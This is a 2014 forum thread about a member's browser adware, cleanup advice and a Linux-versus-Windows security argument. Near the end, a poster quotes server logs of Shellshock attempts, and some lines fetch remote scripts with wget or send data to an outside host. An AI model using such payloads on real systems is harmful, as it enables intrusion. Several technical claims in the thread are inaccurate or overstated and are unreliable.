NFOA MEMBERS FORUM
General Categories => Help! => Topic started by: SemperFiGuy on September 16, 2014, 08:27:29 AM
-
Anybody besides me getting an incredible bunch of junk pop-ups all over the screen when they log onto this Forum?
Down at the bottom of the screen, I'm getting "Java drivers out of date"...... clearly a veiled invitation to download a virus.
Right hand side has "Hot Deals" from the NFL Shop.
Left side, bottom has some kind of bizarre jumping-jack pop-up that says I have a Trojan Horse virus.
Other junk pops in and out from time to time, including a reset of the Forum screen which requires clicking the "X" to get back onto the Forum.
Zillow just popped up. Spontaneously.
Challenging, all that, to a Forum Junkie.
I use Norton frequently to scrub the system. This mess only occurs on the NFOA Forum.
Anybody else?
sfg
-
WOW! DHS possibly?
I've not seen any of this, and I've been fooling around unprotected for quite a while.
Hmmm.. What did you do? And Where have you been?
-
That's bad.
You have malware. I've seen that prompt before on other pc's. Get a malware cleaning tool, like Malwarebytes
Not caused by the forum. Haven't been seeing this on any of my machine while accessing the forum.
-
Nope, but I run Linux. Specifically, Kubuntu 14.04.
I never get infected with any malware.
You are probably running Windows.
If you are using FireFox then check out NoScript: https://addons.mozilla.org/en-US/firefox/addon/noscript/ (https://addons.mozilla.org/en-US/firefox/addon/noscript/)
-
That's bad.
You have malware. I've seen that prompt before on other pc's. Get a malware cleaning tool, like Malwarebytes
Not caused by the forum. Haven't been seeing this on any of my machine while accessing the forum.
Yep, Malwarebytes. Get the full version and let it run. I bet you will be surprised at how much it finds. 1 piece of code in the registry will cause havoc.
-
I also use Malwarebytes, and swear by it. Have never had the problems that SFG is having.
-
Malwarebytes. Get the full version and let it run. ....
Under NO conditions would I connect a computer running Windows to the Internet without having a firewall and malware applications installed. Those should be added before the cable is plugged in or the wireless connection is logged onto. (Carry them in a USB stick from a protected computer.) Also, NEVER EVER suspend or disable the automatic update feature that Windows automatically runs. Updates from Microsoft do the following:
1) Fix bugs in software, making them run better or the way they are supposed to
3) Patch security holes in software that have been recently found and fixed.
Malwarebytes (the subscription version not the free one) is recommended by Steve Riley, author of "Protect Your Windows Network Perimeter" (http://www.amazon.ca/Protect-Your-Windows-Network-Perimeter/dp/0321336437/ref=sr_1_2?s=books&ie=UTF8&qid=1410885645&sr=1-2) and former Microsoft Security Guru. You can catch his postings on KubuntuForums.net (https://www.kubuntuforums.net/content.php), where I persuaded him to replace me as a global administrator a couple years ago when I retired from that responsibility. That forum is not for Linux users only. Most of the admins and users also run Windows and any questions about Windows will be politely and graciously answered.
Malewarebytes should be set to automatically do a FULL scan your computer at least once every week, if not every night. Before running a Malwarebytes scan be sure to update Malwarebytes vaccine data file first. The latest vaccine file will contain the signatures of the most recently discovered malware. Having Malwarebytes set to run automatically (usually after midnight or on a weekend) will also cause it to automatically update the vaccine file. Running Malwarebytes without updating the vaccine file would be a waste of time.
Also, understand this: all it takes to change an old and well recognized piece of malware is to edit its source code and shuffle some of the lines of code around, without changing the functionality, or, adding new functionality, and then re-compiling it. Ta Da! A new virus that can escape detection by an AV product running with the latest vaccine data file. That's why Windows is attacked by as many as 2 million malware programs per year, or more. That, and the fact that Windows "ActiveX" technology automatically runs a program without asking the user, especially if the user got frustrated with clicking "Ok" on the User Access Permission popup and disabled it.
When an old virus is re-compiled or a new virus is created and the executable is distributed by email or the web, several thousand, or tens of thousands of users must get infected, and recognize they've been infected and send in a report and a specimen of the virus program to Microsoft or other security houses so that a vaccine can be prepared. A "vaccine" is just a line in the data file which contains the "signature" of the header of the virus executable. Until that signature is in the vaccine data and users update their vaccine data file and run the AV application, the personal information of the users is exposed to the undetected virus or Trojan. In the past Microsoft has been very laxed with AV security. Sometimes they won't fix a hole except by telling their customers to update to a newer version of Windows, thus using the vulnerability of their OS as an revenue generator.
Another BIG way to minimize infections is to stay away from those websites where the malware is as thick as fleas -- porn sites.
-
It's not just porn sites, it's any site that has banner ads most of which use either ActiveX or Java. You can also be had with a port scan. He'll my mother got a nasty virus off of a Christian Science site 5 or 6 years ago. Anytime you have a static IP you are a known quantity.
Me I run a double firewall, one on my machine and a MAC address access on my wireless LAN. Norton and Malwarebytes do the rest and both are set to update daily, and scan twice a week.
-
When I was running a shop out of my garage, I lost a computer to something nasty by looking up mechanical tips/ help site. Killed it dead.
Kids is shot due to game sites loaded with ads.
(my problem with Norton is it slows things down sooo bad.
-
AdBlockPlus.org (http://AdBlockPlus.org)
-
Well, I ran the Malwarebytes (free version). Wanted to see if it worked out before taking on the commercial version.
Started at Malwarebytes.com. Norton jumped in and said "NO-NO Bad Stuff!", so I tried Malwarebytes.org, which produced a legit-appearing scrubber. From which I ran a scan.
Got 17 quarantined items from the scan. Closed out the scan cycle.
Still got issues. In fact, the screen is jumping all over the place right now, even as I type here. It's like a kaleidoscope on steroids.
Funny thing: Norton doesn't seem to have a clue about any of these malware goings-on. In a few minutes, I'll run the Super-deep Norton scan and see if it makes a difference.
And maybe later try the AdBlockPlus.
And give up my Porn Sites??? Geeezz.... Be merciful!
sfg
PS - Got this msg:
Reported Attack Page!
This web page at clk2trk.net has been reported as an attack page and has been blocked based on your security preferences.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
-
supposed to be a browser hijacker..............copied of of a google search.
Uninstall/Remove Clk2trk.net - ITunes Error Smart
www.ituneserrorsmart.com/uninstallremove-clk2trk-net-how-to-completely- (http://www.ituneserrorsmart.com/uninstallremove-clk2trk-net-how-to-completely-) remove-clk2trk-net-in-a-windows-pc/?Cached
Sep 5, 2014 ... Common Symptoms Caused by Clk2trk.net. Constant redirects and unfamiliar
pop-ups will be shown to annoy users badly; The malware hacks ...
-
Norton power eraser does work with some malware but mostly for a virus. Problem with malware is that it allows other nasty things to be downloaded and installed. Some of the newer bugs out there will actually protect themselves from being picked up by AV and AM programs. They shut down and hide, or they will actually shut off the programs. I have seen some that dump so much crap in the registry and hidden folders containing the exe file that the only way to get it all was a complete wipe and reinstall.
-
Many times these are all buried in your profile. Rebooting to clear that our of memory and logging in with a different account brings you up clean. Then you can run the malware cleaner. But you need to have had other accounts on the machine. And the account you have been using doesn't have admin rights, right?
Malware sucks. can be a big pain to clean. I've done a few and shake my head at the crafty things some of them do. Like hijack your browser settings and point to itself as a proxy server and other fun stuff like that.
-
Well, thus far, nothing that has been suggested has worked to cure the computer shakes.
So--fortunately--I have access to the excellent computer tekkies at the university. These guys are Solid Gold at shaking the junk out of computers.
This one will be in their capable hands by this time tomorrow.
Thanks to all the Fine Fellow Forum members who chipped in w/wisdom and advice.
Aren't we glad our firearms don't get malware, viruses, and other such junk!
sfg
-
Aren't we glad our firearms don't get malware, viruses, and other such junk!
Wait for the smart guns!
-
Multiple site scanners say the forum has no issues found
-
Multiple site scanners say the forum has no issues found
Yup. Appears to be my own computer, not the Forum. And only the Forum page in my computer.
Guess the Hackers know which page I use most.
sfg
-
Yup. Appears to be my own computer, not the Forum. And only the Forum page in my computer.
Guess the Hackers know which page I use most.
sfg
Heartless bastards!
-
Heartless bastards!
'Bout got that one right.
And probably Anti-Gunners.
sfg
-
They shut down and hide, or they will actually shut off the programs. I have seen some that dump so much crap in the registry and hidden folders containing the exe file that the only way to get it all was a complete wipe and reinstall.
The keyboard logger Trojans are the nasty ones. They hide in the phantom drive that Microsoft uses to store a copy of Windows, and/or they vector the boot record of the HD. EVEN IF you use your reinstall CD and reformat and reinstall Windows the phantom partition is not reformatted, nor is the boot record rewritten. The result is that after all that work of reinstalling everything to start fresh the keyboard logger loads in before the Windows OS does and sets itself above OS memory, pulls all the malware back in, and watches everything you type and keeps track of it. It stores your keystrokes in a hidden file and every so often calls home and posts the file to a compromised computer in some other part of the world. He then retrieves your info (bank name, login name and password) from that computer to his computer, usually via RCC, a relay chat channel, onto which he logs using FireFox-Tor. No IP trace of his computer tracks are created.
To clean it out entirely one must remove all partitions of the HD and combine them into one, reformat that single partition, and then re-partition it and reinstall the OS. With Windows that is impossible to do because Microsoft no longer includes an Install CD. You have to create one when you complete the Windows setup, and it only allows you to use the phantom drive to recreate Windows. That's why buying an install CD from Amazon or NewEgg is better than using the re-install CD created during the install because you can repartition and reformat the entire drive, cleaning it off, and then re-install Windows.
-
I run chrome with ad blocker. See if that helps.
-
Well............
SOMETHING helped.
At first, it didn't seem that Malwarebytes fixed anything. Immediately afterward running Malwarebytes, I got in touch with a Live Human Tekkie, connected by an "apparently-valid" web notice recommending that I call a phone number and walk through some repair steps.
Now.....Between MWBs and the Tekkie, the junk appears to have disappeared from the NFOA Forum page. For example, I can type this message right now free from the bizarre leaping pop-ups of yesterday. Which is a major improvement.
Still some odd things. Like....My Google search entry space has ebay ghosted in it. Any search string entered therein immediately goes directly to ebay and not to the general world-wide web. I have to enter google.com up in the URL space and press Enter to get on the web.
GreyGeek's info up above is an alarm bell to us all. Can't even wipe the computer clean and reload the operating system w/confidence. Still all that lurking stuff. I'm going to copy GG's message and give it to our university Techies (who are probably well aware of this situation) because this computer will be in their hands today. Even thought it appears cleaner for the moment, it probably isn't.
Must be one heck of a lot of money to be made by hijacking computers, because the outlay of time and energy to create this junk is enormous.
Thanks to all of you Good Guy Responders.
sfg
-
Sounds like it hijacked your browser settings which is typical. GG is right if it's a boot sector virus then his way is right, but most if not all virus writers leave the boot sector alone as it's more profitable if the machine runs. Then you have ransom ware which actually does play with the boot sector through 3 keys dropped in the registry which will lock the OS out of the boot and bring up a ransom screen. Then there are killer virus that actually eat everything on the drives by initiating the disc format function. Bye bye everything. Not hard or expensive to write a virus. The profit comes from you not knowing its there, passing on to friends and using your machine normally. Bank account passwords and such is where the money is.
-
Still some odd things. Like....My Google search entry space has ebay ghosted in it. Any search string entered therein immediately goes directly to ebay and not to the general world-wide web. I have to enter google.com up in the URL space and press Enter to get on the web.
Use the Control Panel's "Uninstall Programs" to remove adware like Norton, Ebay, Yahoo and the other junk. Reboot.
If you use FireFox open a new tab and enter
about:plugins
to see what plugins are running. You shouldn't see any adware.
FireFox also has a customize setting that allows you to remove ebay and yahoo, the two main culprits in capturing your search engine results, especially 404 (page not found) results. A the left side of the text box which is to the right of the URL box is an "alternate search engine". Click on the down arrow and select "Manage Search Engines". Remove any you don't want and put them in the order you want for searching to take place.
Or, unless you have a specific reason to run Windows because of some special software, install Kubuntu and kiss all that stuff goodbye. Kubuntu's installation process and desktop looks similar to Win7 and there is a valid question as to who copied whom.
-
GG:
Checked the plugins. Got lots of 'em. Now, it appears that users can't just hit <delete> and delete them. Unlike add-ons. Had 5-6 add-ons that deleted nicely. Will figger out which plugins to remove and how to do so.
Through Control Panel/Uninstall I've now uninstalled most of what I can clearly recognize to be unwanted items. A bit spooked about going further into the items w/odd or unrecogizable names.
Running Malwarebytes in the background again, just because I can and it feels good.
Ran Norton's Power Eraser yesterday, which is allegedly an "aggressive" scrubber. NPE found three BAD category items and we wiped them out.
I'm now gonna go for the search engines, per your suggestions.
Will then check out Kubuntu. Sounds like an alternative O/S.
Back later.
Thanks for suggestions.
sfg
-
Will then check out Kubuntu. Sounds like an alternative O/S.
It is, and it is free. So are all the programs (70,000+) and all the updates and new releases. It's what is called "Open Source", the real open source based on the GPL (https://en.wikipedia.org/wiki/GNU_General_Public_License). Basically, if you can use a mouse with Windows you can use it with Kubuntu.
Here is videos which, rather quickly, shows how to install it and then gives a brief review. It gives the entire disk to Kubuntu, wiping out Windows.
http://youtu.be/VNzZr4aFPVY (http://youtu.be/VNzZr4aFPVY)
Here is one showing how to set up Kubuntu in what is called a "dual boot" mode with Win8. It's a lot slower than the previous video, and doesn't have much of a review of capabilities.
http://youtu.be/wo2k8pO4O_Y (http://youtu.be/wo2k8pO4O_Y)
It all starts with the free download of either the 32 or 64 bit ISO file, depending on what your PC is, from here:
http://www.cdimage.ubuntu.com/kubuntu/releases/14.04/release/kubuntu-14.04.1-desktop-i386.iso (http://www.cdimage.ubuntu.com/kubuntu/releases/14.04/release/kubuntu-14.04.1-desktop-i386.iso)
http://www.cdimage.ubuntu.com/kubuntu/releases/14.04/release/kubuntu-14.04.1-desktop-amd64.iso (http://www.cdimage.ubuntu.com/kubuntu/releases/14.04/release/kubuntu-14.04.1-desktop-amd64.iso)
After you download one of them (check the md5sum to make sure the ISO downloaded OK) then burn it as an image to a DVD. For dual booting, create a 30-50GB (or more) partition and reboot with the ISO in the cd drive. For a clean single OS install reboot with the cd in the drive. (You may have to set the BIOS so that it tries to boot off of the CDROM first.)
-
P.S. -- I forgot to mention that after you burn the ISO file to a blank DVD you can boot the DVD and then choose the option to run Kubuntu from the DVD without touching your HD or installed OS. It runs a little slower but it will give you a good way to check that your computer is compatible (i.e., the webcam, mic, speakers, headphones, screen, etc... all work).
-
Just in case you Windows users don't have enough to worry about ... there is this article:
http://www.bbc.com/news/technology-28701124 (http://www.bbc.com/news/technology-28701124)
Berlin-based researchers Karsten Nohl and Jakob Lell demonstrated how any USB device could be used to infect a computer without the user's knowledge.
The duo said there is no practical way to defend against the vulnerability.
...
"Basically, you can never trust anything anymore after plugging in a USB stick."
...
However, this latest research demonstrated a new level of threat - where a USB device that appears completely empty can still contain malware, even when formatted.
That is because many manufacturers, according to Microsoft's specifications, include a separate partition on each USB stick where "security" and reformatting software is stored, much like the phantom drive on most computers that come with Windows pre-installed. While one can reformat or even remove the phantom partition on a computer hard drive, the "security" partition on a USB stick is immutable. One can delete its visible contents but not the hidden contents, and one can not remove the partition, or even rename it.
What you are witnessing is a demonstration of the differences between the Windows and Linux paradigm for software execution. Windows is designed to run any program that can be moved into memory from any source, as if it were called as an executable (*.bat or *.exe or DOS command) called directly from the hard drive or USB stick. Hence, an email which contains an attachment which is an executable Visual Basic program or Java applet is seen to contain a .bat or .exe extension and a dynamically linked library, a.k.a. *.dll) given the marketing name of "ActiveX" will execute that attachment. What is really tricky is the way Microsoft wrote Windows so that an attachment can have multiple extensions. Your email client receives an email with an attachment named "nakedpic.jpg.exe". Windows email client (and Explorer as well) shows it to you as "nakedpic.jpg" but the ActiveX control only sees the ".exe", identifies it as an executable, and immediately executes it.
Compare that to Linux.
In Linux EVERYTHING is a file ... applications or programs, ports, sockets, everything ... and they must exist and reside on the hard drive.
An executable file in Linux is one which meets the following conditions:
1) It resides as a file on the hard drive.
2) It is an ELF binary (ELF=Executable Linux File) OR a shell script executable shell commands with "#!/bin/sh" as the first line. Or a java applet.
AND
3) Your account's execute permission bit for is is set.
Only if all of these conditions are met will an executable binary, shell script or java applet run on Linux.
(An aside: Apple Mac's, like Linux, are also a Unix derivative operating system, but they have relaxed the security controls somewhat. Regardless, I'd run a Mac before I'd run Windows.)
So, as a Linux user, if you were to get an email with a malware attachment the ONLY way it could run on your Linux system was if YOU detached and saved the attachment to the hard dirve. THEN, you marked the execution bit. THEN you gave a shell command to run it.
This is why Linux is not susceptible to email attachments. About the only reason Linux users run email virus scanners is IF they happen to forward an on to a Windows using friend. A friend doesn't send malware to another friend.
Why won't the invisible malware on the USB stick activate when plugged into a Linux system? After all, it is a file on the "hard drive", i.e., the USB stick. Well, even IF it were an ELF or proper bash script, it would have to have it's permission bit for MY account set. And, I'd have to know its secret name and location and deliberately set its permission bit and then deliberate give a shell command to run it. On Linux it won't run itself, there are not "ActiveX" dll's residing in memory just waiting to see an executable anywere (memory, HD, USB, Eth0, Lpr, socket, etc...) so it can execute it. This is why Windows has millions of malware programs released against it each year. It is SO vulnerable. And, to maintain backwards compatibility with pre-existing applications, it must remain so. IF you run Windows then hopefully the time gap between when a particular piece of malware is released and when it is discovered, announced and patched, is short enough that you don't fall victim. More often that not that time gap is months or years because Microsoft has threatened software security houses with crippling or destroying lawsuits IF they find a security hole and announce it to the public BEFORE Microsoft does. So, most security houses send the bugs they find to Microsoft. Microsoft decides IF they will fix the security hole or program bug AND when. If past performance is any indication it all depends on their bottom line.
I often hear Windows fans proclaim that IF Linux were as popular is Windows it would have just as many malware programs released against it as Windows does. Time has proven that belief wrong. Linux now holds about 12 to 18% market share in the US, depending on who you believe. In 2008 Steve Ballmer himself presented a graph at that time showing that Linux held 10% market share in the US. With the advent of VISTA and Win8 many, many Windows users have migrated to Linux or Mac and the Linux market share is much higher in many other countries. Two million Windows malware applications are released per year. If popularity were the rule, it would mean that at least 200,000 Linux malware programs were released last year. None have been found. The AV houses, always willing to sell Linux AV software, have taken to a dishonest tactic -- they began including the word "linux" in many of their jpg viruses just to give the impression that AV software is sorely needed in Linux. It is not. I've been using Linux since May of 1998 and I haven't used AV software. Linux has no "ActiveX" dll's which automatically execute programs.
The best way to destroy the security paradigm of Linux is to pile a lot of globally permitted Java applets on top of it, mimic ActiveX, and call it Android. :(
-
I'm gettin' computer paranoid-er all the time.
(Even tho' my Forum page nicely cleaned up after all the fine suggestions up above. Hmmm... It isn't actually paranoia when They are Really Lurking Out There and Coming to Get You.)
Question for GG: Any opinions on Reimage? PC World likes it. Reimage provides nice remote diagnostic displays (all showing that your computer has computer-Ebola, of course) and doesn't cost all that much Any real security value/utility in it?.
sfg
-
Any opinions on Reimage? PC World likes it. Reimage provides nice remote diagnostic displays (all showing that your computer has computer-Ebola, of course) and doesn't cost all that much Any real security value/utility in it?.
No. A $70/yr subscription program that runs from the Internet to check your Windows operating system files ONLY, not your Windows application files, like Office, or any 3rd party apps that you may have installed. Those non-OS files can be infected as well, especially Office or Word. IF Reimage finds a system file on your computer with a signature different from its own version it will replace it. If Microsoft updates your files automatically, as you should allow it to, and replaces a system file that "Reimage" hasn't obtained yet, Reimage will replace the improved file with their older version, which may be infected with something that Reimage hasn't learned about yet. That's not good. It does, after all, have to get those OS files from Microsoft, and in the process its copy could get infected from malware on its own site.
Running Windows you need to have ALL the files on your system checked. Malwarebytes does this for a subscription fee. If you want to save money and use Microsoft's AV product, called "Security Essentials" you can download it from here:
http://www.microsoft.com/en-us/download/details.aspx?id=5201 (http://www.microsoft.com/en-us/download/details.aspx?id=5201)
The advantage is that all Microsoft system and application patches have to come through Microsoft itself. Going to a third party merely adds delay to the process.
By the way, computer magazines which feature proprietary software like Windows and other applications for which the user must purchase a license agreement (they NEVER own that software and it can be pulled out from under them at any time without notice) have a vested interest in not reporting damaging information related to any product which the maker of purchases ad space in their mag or on their web page. Such companies also hire folks to post glowing reviews about their products on various forums and to challenge negative posts. They also swamp Google search terms with web pages pretending to be "software review" sites but when you go there all you hear are glowing reviews. For example, do a Google search for "reimage scam". You'll get web page banners like:
Is Reimage a Scam? Our Shocking Reimage Review Reveals the Truth!
Reimage Repair Review , Is Reimage a Scam ?
Reimage Repair Scam « Product Scams
REIMAGE FREE REVIEW | Is it SCAM or LEGIT?
and more. Check them out and you'll see that all the reviews are 9's and higher and the comments are glowing, almost miraculous. For example, PC mag rates it 3/5 but if you check out the last link I gave, which is
http://www.free-review.org/reimage-3 (http://www.free-review.org/reimage-3)
you'll notice Reimage is rated at higher than 9 out of 10. That is prima facia proof to me that Reimage is basically a scam which does nothing of value except re-doing what Microsoft Update automatically does for free and more timely as well. If you use "whois" to locate who owns the servers those glowing reviews reside on you'll notice that they register them through anonymous register or hosting organizations. Companies that are doing business straight up do not do that.
-
Aha!
The old Reimage scam!!
First, let me thank you for the considerable energy and effort (not to mention knowledge and skill) which you put into the above posting.
And next, for saving me the $70+ Buck$ that I woulda happily spent to avoid future pop-up, virus, malware, and similar computer calamities.
Finally, and most importantly, for helping me sidestep the Great Expectations/Greater Letdown cycle that woulda happened somewhere along the line.
Deeply appreciated.
sfg
-
LMAO Linux and OS X are safe???? Guess there are some pretty smart crooks, big big security flaw.
http://www.zdnet.com/first-attacks-using-shellshock-bash-bug-discovered-7000034044/ (http://www.zdnet.com/first-attacks-using-shellshock-bash-bug-discovered-7000034044/)
-
LMAO Linux and OS X are safe???? Guess there are some pretty smart crooks, big big security flaw.
Keep laughing. There were NO "smart crooks". Stephane Chazelas, a RedHat security engineer, discovered that Bash incorrectly handled trailing code in function definitions, during one of his many code reviews. Chazelas is one of hundreds of professional coders who continually run code reviews on Open Source GPL software.
The bug announcement (http://www.ubuntu.com/usn/usn-2362-1/) was made on Sept 24th but my Kubuntu installation was automatically updated from the repository with the fix THAT morning before I heard about the bug. Logs before the announcement show no attempts at using that hole as an attack, but since that announcement those "smart crooks" have been pounding fruitlessly at the back doors, as logs reveal. Here are some examples of failed attempts, beginning one day after the announcement, but not before:
24.251.197.244 - - [25/Sep/2014:09:55:10 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
109.95.210.196 - - [25/Sep/2014:17:52:45 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 565 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h= (http://singlesaints.com/firefile/temp?h=)******.co.uk -O /tmp/a.pl\""
166.78.61.142 - - [25/Sep/2014:17:54:03 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
93.103.21.231 - - [26/Sep/2014:03:17:21 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http:// (http://taxiairportpop.com/s.php?s=http://)*******.co.uk/'"
Here is the telltale set of symbols which reveal an attempt at a bash attack:
"() { :;}; ...
Now compare that lightening fast response in the Linux world with how responses occur in the world of Windows. Microsoft has threatened any security house with a law suit if their security experts announce a security hole. Microsoft requires that they pass all information on to Microsoft, which reserves the right to announce the bug and the patch, usually on the same day, but on a day of their choosing. Unfortunately, that day may be months or years after the hole was found, depending on Microsoft's financial needs. Fortune 500 companies, however, are given immediate notice of most bugs, along with suggested patches or bypasses until a permanent fix comes along, because they have the financial clout to sue Microsoft for losses occurred due to holes in Microsoft's software. You and I don't. You, however, are left swinging in the breeze with your britches down, hoping some "smart crook" doesn't hit your vulnerable system. That is a forlorn hope, however, because all it takes is an email hitting your inbox with an executable that has been recently modified to bypass the AV software that you run. You don't even have to look at the email or even open it. It all has to do with Microsoft's "ActiveX" technology, which runs any executable it sees, regardless of where it sees it.
Sometimes, in response to certain holes, Microsoft's advice was to buy the next version of Windows, "which has the fix". Nice. Using their own security holes as a profit center.
So, laugh all you want. Your the one paying through the nose for Windows, Windows upgrades and Microsoft products and their upgrades on an endless update treadmill. $$$ For example, VISTA was supposed to replace XP but was so bad Microsoft made their users pay for Win7 as fast as they could push it out. Win7 is XP with lipstick. More recently Microsoft replaced Win7 with Win8, which was so bad that most folks refused to upgrade to it or buy computers or pones with Win8 on it, so Microsoft had to rush Win8.1 out, which is a step backward toward Win7, but you have to pay for it anyway.
Me? I've been running Linux since May 1st, 1998, and I've never even seen a Linux malware in the wild, much less get infected by one. The Bash bug isn't "malware" anyway. In order to execute a command on a Linux box remotely you first have to gain access to Linux operating system. To do that you have to break into the IPTables firewall which about every Linux distro runs. Kubuntu, for example, automatically blocks all 65,535 ports, making my box almost invisible when viewed from the Internet. I've been running Kubuntu since January of 2009 and I've never paid a single penny for it, or any of the software on it which I run, all of it world class software equal to or better than anything Microsoft makes, and certainly more secure.
So, laugh away. The laugh is on you.
-
Well, this post has engendered some interesting hi-tek conversation.
Meanwhile, my Forum visits are not longer interrupted by the Jumping Pop-ups, because I implemented many of the suggestions offered here to solve the problems.
Many, many thanks to All............................ It is certainly a most welcome relief to have a working computer again.
sfg